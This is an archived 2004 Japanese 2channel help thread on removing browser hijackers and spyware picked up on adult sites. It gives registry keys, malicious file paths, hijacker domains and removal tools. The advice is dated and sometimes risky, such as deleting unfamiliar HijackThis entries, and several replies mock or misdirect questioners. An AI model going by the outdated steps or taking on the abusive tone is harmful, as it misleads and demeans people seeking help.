5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

エロサイト見たら…助けてください!Part31

1 :774:04/07/04 13:12 ID:4gz1MeA0
エロサイトを見て回ってたらとんでもないことになってしまった…。
いったいどうしたらいいの?って人の為のスレッドです。
★9割以上のトラブルは、FAQを読めば解決できます★

▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━
  ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
  ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
  ・ 他の場所から誘導された場合は、その旨書き添える事。(マルチポストとの区別)

■一通りFAQを "実行" してもお手上げの場合は、質問しても良し。■
(OS、ブラウザ、症状、やってみた事、等を明記しないと放置 or ネタ回答)
■エロサイト逝く時のブラウザはMozilla FirebirdかOpera使え■
(IE使うなら最低でも、ツール〜インターネットオプション〜セキュリティーを高にしろ)

エロサイトを安心して見れるタブブラウザー

Mozilla Firebird (フリー)
http://download.ascii.jp/win/3/00031/10975.html

Opera (アドウェア)
http://download.opera.com/

Webブラウザ乗り換え (もうIEを使うのはやめて、他のWebブラウザにしてみませんか?)
http://allabout.co.jp/career/netsecurity/subject/msubsub_changebrowser.htm

2 :411:04/07/04 13:12 ID:???
2

3 :ひよこ名無しさん:04/07/04 13:13 ID:???
3peace☆

4 :テンプレ1:04/07/04 13:15 ID:bYWz/59B
エロサイトに限らずWEBを見て回ってたらブラウザ乗っ取られて大変なことに…
いったいどうしたらいいの? って人のためのスレッドです。

▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること
 ・ 他のスレから誘導された場合は、その旨書く。同時質問(マルチポスト)は厳禁
 ・ OSの種類(必須)、ブラウザ、セキュ関係ソフトの有無、やってみたことを明記

1) このスレのテンプレは★まとめサイト http://haiiro.info/my/text/template.html
 が見やすいです。(セキュリティ関係の情報サイト「スターマジック」の「はいいろ」
 さんのご好意で作成されています。感謝。リンク集も充実してます)
2) まず「まとめサイト」の★応急処置できるとこまでやってみてください。Me/XPの
 人は★応急処置「システムの復元」を試してください。いきなり教えて君はネタ回答
 食う可能性大w
3) 迷惑ソフトはまず「プログラム(アプリケーション)の追加と削除」からアンインスト
 できないか確認。迷惑画面に★uninstallとか★removal instructionsというリンクが
 貼られていたらダメもとで試してみましょう。
4) ★重要★IEの部品を利用しないブラウザを利用するとハイジャックや強制ダウンロード
  などほとんどのトラブルが防げます。
 Opera7.5(最新版) http://download.opera.com/
  Opera7.5 日本語ファイル http://my.opera.com/community/customize/langs/
  Operaをinstallしたフォルダへdownload→OperaのmenuのTools→
  Preferences→ Languages→ User Interface Languageでchooseボタンを押し、
  downloadしたja_7818.lngを選択→OK
 Firefox http://jt.mozilla.gr.jp/products/firefox/ ←窓左上のWindows-日本語版
5) ★Windows Updateも必須  http://v4.windowsupdate.microsoft.com/ja/default.asp
6) テンプレを変造した危険なリンクに注意。cgi, php, htm, html など実行可能なリンク、
  nu, ru, tv, wsのような地域、img-box、galleryなどの公共ファイル置場は地雷多し

5 :テンプレ2:04/07/04 13:16 ID:bYWz/59B
《応急処置》
WEB見ててブラウザが変になったらとりあえず以下を実行。ブラクラ、ジョークソフト、
ブラウザジャッカー、スパイウェアなどの迷惑ソフトの8割はこれで撃退できますよん。

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除→OS再起動
6)Me/XPの場合「システムの復元」を試してください。正常な状態に復帰できるかも。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]
 復元フォルダに悪プログラムが残ったままになるのでアンチウィールスのスキャン
 で警告が出たり、うっかり再度復元して緊急事態に逆戻りしたりに注意。また復元
 ポイントは日付の古いほうから順に消えていきます。正常なポイントがどれだったか
 紙にメモ取るなりして管理しときましょう。
7) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  本家 http://www.spywareinfo.com/~merijn/downloads.html(更新頻度高)
 b) Ad-Aware http://www.lavasoftusa.com/ (更新頻度高)
 c) Spybot-S&D http://www.safer-networking.org/ (最新版 v1.3)
8)「助けて」状態が一段落したらWindows Updateでセキュ穴を埋めておきましょう。
  http://v4.windowsupdate.microsoft.com/ja/default.asp

6 :テンプレ3:04/07/04 13:16 ID:bYWz/59B
《ブラウザハイジャッカーと戦うときの必須ツール》
レジストリのスキャンと修復ツール Hijackthis
 http://higaitaisaku.web.infoseek.co.jp/HijackThis.exe 
日本語解説 http://higaitaisaku.web.infoseek.co.jp/hijackthis.html (詳しい)
入門チュートリアル http://haiiro.info/my/text/template.html#5 (簡易版)

《アンチスパイソフト》
■CWShredder CoolWebSearch専用駆除ソフト 更新:高
  本家 ttp://www.spywareinfo.com/~merijn/downloads.html
■Ad-aware 6.1 スキャン、駆除 非常駐(有料版は常駐監視機能あり)
  本家 ttp://www.lavasoftusa.com/ 更新:高 
  オリジナルの使用法 http://higaitaisaku.web.infoseek.co.jp/adaware.html
  日本語化使用法 http://www.dream-seed.com/server/spy.html 
■Spybot Search&Destroy 1.3 常駐機能あり・スキャン、削除、予防 更新:低
  本家 ttp://www.safer-networking.org/ 更新:低 日本語対応済み
  1.3新機能対応使用法 http://higaitaisaku.web.infoseek.co.jp/spybot2.html
 -----3大定番は必ずインストールして、最新版にアップデートしておこう------

■SpyywareBlaster 2.6.1 予防 ☆更新頻度:中
■SpywareGuard 2.2.0 常駐・予防 ☆更新頻度:低
■MRU-Blaster 1.5 各種履歴キャッシュ・クッキー削除。常駐 頻度:低
 以上3種類本家 ttp://www.javacoolsoftware.com/index.html
■各種フリーウェア日本語化パッチ配布所(Ad-aware 6.0 Build181 日本語化ツール
 SpywareBlaster 日本語化、SpywareGuard 日本語ヘルプ など)
 http://bdc.s15.xrea.com/index.php?option=com_remository&Itemid=59&func=selectfolder&filecatid=1
■IE-SPYAD  IEの制限ゾーンに危険サイトを一括登録  頻度:高
 本家 ttp://www.staff.uiuc.edu/~ehowes/resource.htm
 IE-SPYAD導入の手引き(日本語解説ページ)
 http://www.geocities.jp/ie_spyad_japanese_manual/index.html
 専用スレ http://pc.2ch.net/test/read.cgi/sec/1076041687/

7 :テンプレ4:04/07/04 13:16 ID:bYWz/59B
《その他リンク集》
■ウィルス関係はこちら↓
ウィルス情報&質問 総合スレッド☆Part20
http://pc5.2ch.net/test/read.cgi/sec/1086098775/
■その他セキュリティ関係の質問は↓
 セキュリティ初心者質問スレッドpart43
http://pc5.2ch.net/test/read.cgi/sec/1087093973/
■アダルトサイト被害対策の部屋
 http://higaitaisaku.web.infoseek.co.jp/
 定番老舗サイト。Hijackthis、その他ツールの使い方が詳しい。質問掲示板あり
■架空請求、ダイヤルQ2、国際電話、罠サイトなどのトラブルはここらで相談。
【Mail・葉書】総合スレッドPartW【架空請求】
http://that3.2ch.net/test/read.cgi/bouhan/1086362147/
  アダルトサイト対策の部屋
   http://www002.upp.so-net.ne.jp/dalk/higai24.html
  「被害対策の部屋」とは別サイト。有料エロサイト関係のトラブル対策
■国際電話・ダイヤルQ2関連
  http://www.ntt-east.co.jp/q2/ NTT東日本 ダイヤルQ2サービス
  http://www.ntt-west.co.jp/q2/ NTT西日本 ダイヤルQ2サービス
   ダイヤルQ2接続チェックプログラムもここからダウンロードできます。
 http://www.emurasoft.com/jp/chintcal/index.htm      No! 国際電話
 http://mitsu98.fc2web.com/bbs/index2.html         Dial Saver
 http://www.kddi.com/topics/atx/image.html         ダイヤルアップチェッカー
■バナー・ブラクラ対策
 http://homepage3.nifty.com/hayazo/myprg.html     ClosePopup
 http://www.proxomitron.org/                  Proxomitron(公式サイト)
 http://www.pluto.dti.ne.jp/~tengu/proxomitron/       Proxomitron(日本語解説)
 http://pc5.2ch.net/test/read.cgi/win/1084124599/l50  Proxomitron(Windows板)
 http://pc5.2ch.net/test/read.cgi/software/1060792740/l50  Proxomitron(ソフトウェア板)

8 :テンプレ5:04/07/04 13:17 ID:bYWz/59B
■流行中のハイジャッカーjksearch.biz対策
★症状:IEのホームページが以下のようなエロ系サーチサイトに固定される。
  http:// greatsearch.biz/
  http:// jksearch.biz/redir.php
  http:// cashsearch.biz/redir.php
  http:// 213.159.117.130/cgi-bin/index.cgi?c=1
★HijackThisでログを取っても異常が現れない。
★ハイジャッカーの本体はCWSearchの亜種。ただしHijackthisがスキャンしない
レジストリ項目 shellServiceObjectDelayLoadに巣食うので駆除が面倒。
http://higaitaisaku.web.infoseek.co.jp/removesearchbiz.html
被害対策のページ↑は初心者でも確実に駆除できるよう各種ツールを利用しているが、
ここではもう少し簡略な手動駆除方法を紹介。
★感染確認
スタート→ファイル名を指定して実行→regedit
レジストリエディタを起動したら左窓で順次ツリーを開いて以下のキーを開く。
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\shellServiceObjectDelayLoad"
ここに"system"というエントリができていれば感染している。
★駆除方法
1)system エントリのCLSIDの値をメモする。(メモ帳にコピペして.txtファイルで保存しておく)
 (例) System = {362A19F1-EA5D-4733-8292-58DECE98C0BC} ←この{ }内の英数字
2)System 項目をレジストリエディタで選択→右クリック→削除。
 HKEY_CLASSES_ROOT\CLSID\にもこの値が登録されているので問題のCLSIDの値で検索し、
 同様に削除。 (左窓でHKEY_CLASSES_ROOT\CLSID\を選択反転→メニュー→編集→検索)
3)Hijackthisでスキャン→R1〜R3 -Internet Explorerのスタートページやサーチページの値→
 後からどうにでもできるから、見覚えないもの、分からないものは全部削除
4)IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→プログラム→
 WEB設定のリセット  IEの履歴削除→ツール→インターネットオプション→全般→インターネット
 一時ファイル→クッキーの削除+ファイルの削除→OS再起動
5)本体ファイル↓を削除
 C:\WINDOWS\system32\system32.dll / C:\WINDOWS\system.exe

9 :テンプレ6:04/07/04 13:18 ID:bYWz/59B
■流行中のハイジャッカー対策 about:blank、search for型

症状:IEのホームページの設定がabout:blank(空白)であるにもかかわらず、CoolWebSearch系
のsearchexe.comや、search for…と表示されるサイトに飛ばされる。
「被害対策」に詳しい専用ページ↓があるが、詳しすぎて初心者は息切れしそうなのでw
「解説の解説」をしておく。http://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html

「レジストリのAppInit_dllsという値の削除」と、「悪サイトの画面のソースコードを解読して
悪ファイル本体を探す」というのがポイント。

1 《応急処置》>>3をまず実行。特にWEB設定のリセットを確実に。
2 レジストリのAppInit_dllsキーの削除→ここには悪以外存在しないので問答無用で削除。
 キー名称:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
 レジストリエディタでこのキーを開く。右側窓でAppInit_dllsを選択、削除。もし削除が拒否
 されたときは、左側窓で\Windowsというキー名称をWindows2などに変更してからAppInit_dlls
 を削除→Windows2を元のWindowsに戻す→Windows再起動
 詳しいことは→ http://higaitaisaku.web.infoseek.co.jp/appinitdlls.html
3 about:blankで「Search For...」に飛ばされる場合、悪ファイルの素性が画面ソースのなかに
 エンコードされているので、解読して削除する。
 方法:Search for画面の適当な場所を右クリック→「ソースの表示」をクリック→
 メモ帳が開く→ <!-- saved from url=res:// エンコードされた文字列>という部分をコピー
(エンコード文字列の例)
 <!-- saved from url=res://%43%3a%5c%57%49%4e%44%4f%57%53%5c%53%59%53%54%45%4d%5c%47%49%4e%43%4e%45%41%2e%44%4c%4c/%73%70%2e%68%74%6d%6c --> ←"<" から ">" までコピーする
 →コピーした文字列をhttp://higaitaisaku.web.infoseek.co.jp/aboutblankdetector.html
 このページに貼り付けてDecode Thisボタンを押して解読→悪ファイルの名称と位置がわかる
 →Windowsをセーフモードで(F8連打して)起動して見つかったファイルを削除する→(゚д゚)ウマー
4 Windowsを再起動、念のため《応急処置》をもう一度実行する。

10 :テンプレ7:04/07/04 13:19 ID:bYWz/59B
●まず、デスクトップに新しいフォルダを作る。
デスクトップ上の何も無い場所を右クリック「新規作成」→「フォルダ」を左クリック
名前をつける、Hijackthisなど(適当な名前でよい)。
http://higaitaisaku.web.infoseek.co.jp/HijackThis.exe
「保存」を押すと、保存先を聞かれる。
保存先には、先ほど作成した新しいフォルダを指定する。

●Hijackthis以外の窓を全部閉じる
Main画面でSCAN→SCANボタンがSave Logボタンに変わる→ボタンを押す→
Highjackthisが存在するディレクトリを選んで実行→ログファイルが作成されメモ帖で開かれる。
このログを貼り付ける。

●コントロールパネルの「アプリケーションの追加と削除」(Win XPの場合)「プログラムの追加と削除」に怪しいものがあったら書く。(重要)

●ウィルススキャンの結果も必ず書くこと。

ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp

*************やさしい鑑定人さんが来るまで気長に待つ************

11 :テンプレ8:04/07/04 13:19 ID:bYWz/59B
     ●【緊急】 早く治したい方は以下を実行して下さい 【処置】●

   WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為) 

1)  IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
   プログラム→WEB設定のリセット

2) IEの履歴削除→ツール→インターネットオプション→全般→インターネット
   一時ファイル→クッキーの削除+ファイルの削除

3)  削除したいファイルがあるが「アクセスできません。使用中です」等といわれて
   削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動

4)  勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
    アプリケーションの追加と削除(JWordはここでアンインストする)→OS再起動

5)  ブラウザジャッカーCoolWebSearch駆除ツール CoolWebShredderをDL
    http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo →OS再起動

6) 定番スパイウェア除去ソフト↓をインストール(併用推奨)

    ・定番 スパイウェア除去ソフト Ad-Aware 使用法
     http://www.dream-seed.com/server/spy.html
    ・定番 スパイウェア除去ソフト Spybot-S&D 使用法
    http://www.dream-seed.com/pukiwiki/index.php?Windows%2FSpybot%A4%CE%BB%C8%A4%A4%CA%FD

7) Me/XPの場合「システムの復元」で正常な状態に復帰させる方法もあります。
   [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
    →[システムの復元]

------以上実行してまだトラブってたら(OS種類必須)再度質問して下さい----

12 :過去ログ:04/07/04 13:21 ID:bYWz/59B
part30 http://pc6.2ch.net/test/read.cgi/pcqa/1088339685/ 前スレ
part29 http://pc6.2ch.net/test/read.cgi/pcqa/1087573951/
part28 http://pc6.2ch.net/test/read.cgi/pcqa/1086932629/
part27 http://pc6.2ch.net/test/read.cgi/pcqa/1086459144/
part26 http://pc6.2ch.net/test/read.cgi/pcqa/1085884342/
part25 http://pc5.2ch.net/test/read.cgi/pcqa/1085408554/
part24 http://pc5.2ch.net/test/read.cgi/pcqa/1084800180/
part23 http://pc5.2ch.net/test/read.cgi/pcqa/1083768109/
part22 http://pc5.2ch.net/test/read.cgi/pcqa/1083241874/
part21 http://pc5.2ch.net/test/read.cgi/pcqa/1082454987/
part20 http://pc5.2ch.net/test/read.cgi/pcqa/1081541559/
Part19 http://pc5.2ch.net/test/read.cgi/pcqa/1079883028/
Part18 http://pc2.2ch.net/test/read.cgi/pcqa/1077184761/
Part17 http://pc2.2ch.net/test/read.cgi/pcqa/1074003703/
Part16 http://pc5.2ch.net/pcqa/kako/1070/10709/1070987138.html
Part15 http://pc5.2ch.net/pcqa/kako/1067/10676/1067657959.html
Part14 http://pc5.2ch.net/pcqa/kako/1063/10634/1063426852.html
Part13 http://pc5.2ch.net/pcqa/kako/1057/10575/1057575418.html
Part12 http://pc5.2ch.net/pcqa/kako/1052/10529/1052909722.html
Part11 http://pc5.2ch.net/pcqa/kako/1047/10473/1047359426.html
Part10 http://pc5.2ch.net/pcqa/kako/1043/10439/1043963296.html
Part9  http://pc5.2ch.net/pcqa/kako/1041/10415/1041587359.html
Part8  http://pc.2ch.net/pcqa/kako/1038/10380/1038097140.html
Part7  http://pc.2ch.net/pcqa/kako/1035/10351/1035125416.html
Part6  http://pc.2ch.net/pcqa/kako/1031/10313/1031391849.html
Part5  http://pc.2ch.net/pcqa/kako/1027/10273/1027339934.html
Part4  http://pc.2ch.net/pcqa/kako/1022/10228/1022827947.html
Part3  http://pc.2ch.net/pcqa/kako/1019/10191/1019182804.html
Part2  http://pc.2ch.net/pcqa/kako/1016/10168/1016896969.html
Part1  http://pc.2ch.net/pcqa/kako/988/988993220.html

13 :ひよこ名無しさん:04/07/04 13:52 ID:B9OQu/G2

http://moreporn.biz/new/index.php
↑のURLに完全に乗っ取られてる・・・誰か助けてください・・・。

14 :ひよこ名無しさん:04/07/04 13:53 ID:???
>>1 乙彼〜

15 :ひよこ名無しさん:04/07/04 14:04 ID:???
テンプレ乙彼ー


まだやらねえ奴が出てるな。

16 :13:04/07/04 14:28 ID:B9OQu/G2

何故か有り得ないぐらいこのURLにhttp://moreporn.biz/new/index.php
強制的に繋がってしまいます・・・。
このスレの直リン部分も全部http://moreporn.biz/new/index.php
になってます・・・。
http://www.ff.iij4u.or.jp/~ch2/bbstable.htmlにリンクしてあるはずなんですが
http://moreporn.biz/new/index.php
↑このURLに繋がってしまいます・・・。誰か対策教えてください・・・。

17 :ひよこ名無しさん:04/07/04 14:32 ID:???
>>16
おい、お前、スパイウェアを広めたいのか?何故URL貼るんだよ。

クズは死ね。

18 :ひよこ名無しさん:04/07/04 14:35 ID:???
>>13
通報しますた(・∀・)

19 :ひよこ名無しさん:04/07/04 16:58 ID:???
テンプレ乙

テンプレも貼らなきゃリンク先も間違ってる馬鹿>> 1は氏んでよし。



20 :ひよこ名無しさん:04/07/04 17:35 ID:???
★ よくある質問とその答え(その1)

Q1:エロサイト見てたら広告がどんどん出るんだけど
A1:Proxomitron使うとかタブブラウザ使うとかしろ。IEでエロサイト見るな。

Q2:ダイヤルQ2に繋がったらしいんだけど
A2:ダイヤルアップネットワークを開いて接続アイコンを確認しろ。
   変なのあったら捨てろ

Q3:何かダウンロードしたみたい
A3:Q2か国際電話の接続ソフトじゃねえのか?ワケも分からずクリックすんな。

Q4:ダイヤルQ2って何?
A4:情報料のかかるNTTの商品だ。3分100円ぐらい通話料の他に発生する。

Q5:Q2に繋がらないようにしたい
A5:NTTに連絡しろ。116に電話してQ2使えないようにしてくれって言え。

Q6:なんかどこクリックしても別のサイトに行くんだけど?
A6:騙されてんじゃねえの?騙しで広告クリック稼ぐサイトも多いぞ(w

Q7:何か注意点とかある?
A7:エロサイトなんか見るなよ。トラブルの元だ。

Q8:スタートページとかがエロになった
A8:過去ログ読んでから質問しろ。非常によくある質問だ。

Q9:時計の隣になんか常駐してるんだけど
A9:msconfigで切れ。Win2000なら窓の手つかえ。


21 :ひよこ名無しさん:04/07/04 17:38 ID:???
★ よくある質問とその答え(その2)

Q10: ホームページや検索窓がエロサイトになってしまった!
A10:Internet Explorerの場合:
  ・ツール>インターネットオプション>全般>ホームページ
  ・ツール>インターネットオプション>プログラム>WEBの設定のリセット
  Netscapeの場合:編集→設定→Navigator→ホームページ

Q11:インターネットオプションで直しても、再起動するとまた戻ってる!
A11:スタート>ファイル名を指定して実行>msconfig>スタートアップの項目についてるチェックを全て外して再起動。
  再起動したら、今度は1つずつチェックを戻していって、エロなホームページ
  になるかどうかを確認していく。何度も根気強くmsconfigと再起動を繰り返して
  最終的には最初にチェックを外したやつのほとんどはチェックが戻り、僅かなエ
  ロサイト関連のものだけチェックが外れた状態になればOK!
  ※Windows95とWindows2000はmsconfigが無いので窓の手を使用するかレジストリのrun項目をチェック。
  これで直ったなら怪しい自動実行プログラムを削除。
Q11の補足説明
■=チェック済 □=チェック無で解説
1:全部チェック外す
□adosh □ghohga □mojgoj            ※症状は出ない

2:1つずつチェック入れていく
■adosh □ghohga □mojgoj            ※症状は出ない

3:1つずつチェック入れていく
■adosh ■ghohga □mojgoj            ※症状がキタ━━━━━━(゚∀゚)━━━━━━!!!!

4:1つずつチェック入れていく
■adosh ■ghohga ■mojgoj            ※症状が出たまま

5:症状を出すやつが特定出来たので、症状と関係ないもののチェックを戻す
■adosh □ghohga ■mojgoj

22 :ひよこ名無しさん:04/07/04 17:39 ID:???
★ よくある質問とその答え(その3)

Q12:なんか定期的にエロサイトの広告ウインドウが出るんですけど?
A12:まずはA10とA11を実行。その上でウィルススキャン、Ad-awareでスパイウェ
  アをスキャン。Ad-Awareは最新版を使うこと。

Q13:検索が英語になった!
A13:インターネットオプション>全般>言語>日本語 を一番上に。

Q14:なんかGoHip!とかって・・・
A14:GoHip!やSecondpower等は専用の削除ツールが配布されている。インターネッ
  トオプション>全般>一時ファイルの設定>オブジェクトの表示でMicrosoftや
  ShockWave Flash等信用できるもの以外の怪しげなのは依存関係を見てファイル
  を削除。

23 :ひよこ名無しさん:04/07/04 17:52 ID:???

ID:bYWz/59B さん乙です。

24 :ひよこ名無しさん:04/07/04 19:23 ID:gl1mc41S
質問スレッドから教えていただいてこちらに来ました
前のも読んでみたのですが難しくてよくわからなくって・・・
トップメニューの表示が
Chances of having Adware/Spyware installed:99%とでるのですが
ここの>>5の7のabcの三つをやればよいのでしょうか?

25 :ひよこ名無しさん:04/07/04 19:28 ID:???
>>24
とりあえず、それやろう。

26 :ひよこ名無しさん:04/07/04 19:28 ID:???
>>24
いろいろ試すんだ。

27 :24:04/07/04 19:30 ID:???
わかりましたやってみます・・・わからなかったらまた質問させてくださいm(_ _)m

28 :ひよこ名無しさん:04/07/04 19:33 ID:???
>>27
このスレでは質問しても誰もまともに答えてくんねーよ
だから他のスレで聞いたほうがいい

29 :24:04/07/04 19:38 ID:???
>>28
どのスレがいいですか?

30 :ひよこ名無しさん:04/07/04 19:39 ID:???
>>28
解決したらもう来んな!ボケ

31 :24:04/07/04 19:40 ID:???
>>28さん
そうなんですか・・わかりました
最初のところにいってまた聞いてみますありがとうございました

32 :ひよこ名無しさん:04/07/04 19:40 ID:???
>>29
ここ↓
http://idol.bbspink.com/test/read.cgi/soap/1063495186/


33 :ひよこ名無しさん:04/07/04 19:41 ID:???
>>31
いい心がけだ。

34 :ひよこ名無しさん:04/07/04 19:42 ID:???
>>30
あははは(ゲラゲラwww

35 :ひよこ名無しさん:04/07/04 22:37 ID:???
みんな、Cドライブ→Documents and Settings→Default User→Local SettingsのTempチェックしとるかw

36 :ひよこ名無しさん:04/07/04 22:38 ID:???
●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..●

無料のウイルス対策ソフトなどのセキュリティソフト一覧
http://www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html

●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●

37 :ひよこ名無しさん:04/07/05 00:26 ID:???
OSでXPの使用者はファイアウォールをオンにすべきだと思う。ログを見るとびっくり
するよ。

38 :ひよこ名無しさん:04/07/05 01:31 ID:???
>>20-22 これは10スレくらい前のテンプレだな。
貼る意味がわからん。ウザイ。

39 :ひよこ名無しさん:04/07/05 01:35 ID:/ITBMHvw
私もXXXってアイコンが出て困っています
Windows内のDial32は消せと前スレにありました
Dial32はありませんがWindows\system内に「CMDIAL32」ってのを
発見。これは消すのですか?ファイル名にてるけど・・・

40 :ひよこ名無しさん:04/07/05 01:39 ID:/ITBMHvw
もう一回質問。CoolWebSearchにトップページが勝手に設定されるんで
CWShredderと言うのを起動させました。
「asx3test.exe」
「MSNMGSR1.exe」
この二つのファイルは削除してもOKですか?
これを消さずに続けると症状は改善されませんが、ランダムなファイル名では
ないきがします。あと、何回この作業を行っても
ゴミ箱生きのファイル作られ続けているようです

41 :ひよこ名無しさん:04/07/05 01:46 ID:???
>>40
怪しいとおもってるなら、
自己責任で消してみればいいじゃない。

42 :ひよこ名無しさん:04/07/05 20:49 ID:???
>>39
ざまあみろ

43 :ひよこ名無しさん:04/07/05 20:50 ID:???
>>40
ざまあみろ 

44 :ひよこ名無しさん:04/07/06 00:12 ID:2nDXwZya
Internet Explorerのホームがサーチフォーっていう英語のページになってしまいます。
テンプレにあるのをいろいろやってみたんですけど直りません。アドバイスを・・・

45 :ひよこ名無しさん:04/07/06 00:13 ID:???
>>44
窓の手使え。

46 :ひよこ名無しさん:04/07/06 00:15 ID:???
>>44
アイヤーオックスにしときゃいいんだよ。

47 :ひよこ名無しさん:04/07/06 00:29 ID:???
>>44
システムの復元推奨

48 :ひよこ名無しさん:04/07/06 00:38 ID:???
>>44
なにはともあれ、

ざ   ま   あ   み   ろ

49 :ひよこ名無しさん:04/07/06 00:44 ID:???
Internat Explorerのホ〜ムがサーチフォックスっていう英言吾のページになってしまいます。
テンプラにあゐのをいろいるやってみたんですけど直りません。アドパンスを・・・


50 :ひよこ名無しさん:04/07/06 00:54 ID:???
>>44
about:blank対処法暫定ページ
ttp://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html

どうぞ。また>>9の方法でも治せますよ。

51 :ひよこ名無しさん:04/07/06 00:59 ID:do38BRT2
search for...のスパイウェアに感染してしまったのですべての手を尽くして駆除、再発防止を執ったのですが
なぜかまた発生しました。
行った方法は、まず>>5 の7番目の処置、そしてAppInitDllsレジストリを削除しPC再起動、
その後にIEのWEB設定のリセット
です。
念のためもう<<応急処置>>をもう1度実行しました。

にもかかわらず再発してしまい、また駆除してもすぐに再発してしまいます。
完全な対処法待ちと言うことでしょうか。
ちなみに一度駆除してから怪しげなサイトには行っていません。


52 :ひよこ名無しさん:04/07/06 01:01 ID:???
>>51
ざまあみろ(ゲラゲラ

53 :ひよこ名無しさん:04/07/06 01:01 ID:???
>>51
デブは何をやってもデブ。

54 :ひよこ名無しさん:04/07/06 01:05 ID:???
>>51
http://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html
を全部する。何回か繰り返す。

55 :ひよこ名無しさん:04/07/06 01:08 ID:???
>>51

さて、コイツをどうやって騙してやるか。
じわり、じわりとな。

56 :ひよこ名無しさん:04/07/06 01:09 ID:???
>>51
テンプレ読め

57 :ひよこ名無しさん:04/07/06 01:18 ID:do38BRT2
>>56
>>54
また発生したんです。
何度もやりました。

58 :ひよこ名無しさん:04/07/06 01:19 ID:do38BRT2
完全に再発しない方法はないのかな

59 :ひよこ名無しさん:04/07/06 01:22 ID:???
>>58
もう一度セーフモードで実行してみる

60 :ひよこ名無しさん:04/07/06 01:22 ID:???
>>58
4) ★重要★IEの部品を利用しないブラウザを利用するとハイジャックや強制ダウンロード
  などほとんどのトラブルが防げます。
 Opera7.5(最新版) http://download.opera.com/
  Opera7.5 日本語ファイル http://my.opera.com/community/customize/langs/
  Operaをinstallしたフォルダへdownload→OperaのmenuのTools→
  Preferences→ Languages→ User Interface Languageでchooseボタンを押し、
  downloadしたja_7818.lngを選択→OK
 Firefox http://jt.mozilla.gr.jp/products/firefox/ ←窓左上のWindows-日本語版

61 :ひよこ名無しさん:04/07/06 01:59 ID:???
>>58
効くかどうかわからんが、こんなのもあるぞ。
ttp://www.trojaner-info.de/anleitungen/hijackthis/about_blank.html

のSpHjfix.exeとかいうの。

62 :「助けて…」がひと区切りついたら…:04/07/06 02:19 ID:???
「システムの復元」は戻るときもあれば戻らないときもある。運次第。何度も
復元してればいずれは戻らなくなる。

Windows、IE、Outlook、Outlook Expressを常に最新の状態にアップデート
してあれば安全確認ずみサイトやメールは今までどおりIE系ブラウザを
利用しても可(推奨はしないが…)

海外サイト、エロサイト、2chのリンクなど安全に不安がある場合は非IE
ブラウザ(Opera、Firefox)を使う。そういうサイトでは普通あまり複雑な操作
は必要ないはずだから、初めから詳しい操作を覚えなくてよい。

非IEのブラウザをインストールしてあれば、万一IE系のブラウザがやられた
場合に、携帯やネカフェを使うなどの苦労をしないですむ。

初心者が悪プログラムに一度やられるのは仕方ないが、二度三度とやられる
のはアフォ

63 :「助けて…」がひと区切りついたら…:04/07/06 02:20 ID:???
Opera v7.51のインストールと日本語化の手順

■v7.23以前をインストールしている場合は「アプリケーションの(プログラム)の
 追加と削除」からアンインストール。(7.5からは上書きインストで問題ない)

■Opera本家から本体をダウンロード
  Opera7.51(最新版)http://www.opera.com/download/?lng=en&ver=7.51
 いちばん下の赤い DOWNLOAD ボタンを押す。

■Opera本家から言語ファイルをダウンロード
  http://my.opera.com/community/customize/langs/
 Select Opera Version and Language ←バージョンと言語の選択ボックス
 ▼ボタンを押してリストを開く→Windows-7.50 Japnese(1) をそれぞれ選択→
 地球儀アイコンをクリック→ja_74818.lngという日本語用言語ファイルが選択される→
 Opera.exeが存在するフォルダにダウンロードする。

■Operaに日本語言語ファイルを設定
  Operaを起動→OperaのメニューのTools→Preferences→ Languages→
 User Interface Languageでchooseボタンを押す→ダウンロードしたja_74818.lng
 を選択→OK
これでメニューは日本語で表示されるはず。日本語優先の設定もしておこう。
 Tools→設定→言語→「ウェブページの閲覧で優先する言語」で「追加」→
 japanese(ja)選択→「上へ移動」ボタンで一番上にする→「エンコード情報が不足
 しているページに使用するエンコード方法」→shift_jisを選択→適用→OK

64 :「助けて…」がひと区切りついたら…:04/07/06 02:22 ID:???
■Mozilla Firefox 0.9(最新版)のインストール

v0.8以前の古いバージョンがインストールされている場合、アンインストールしてから
クリーンインストールが推奨です。

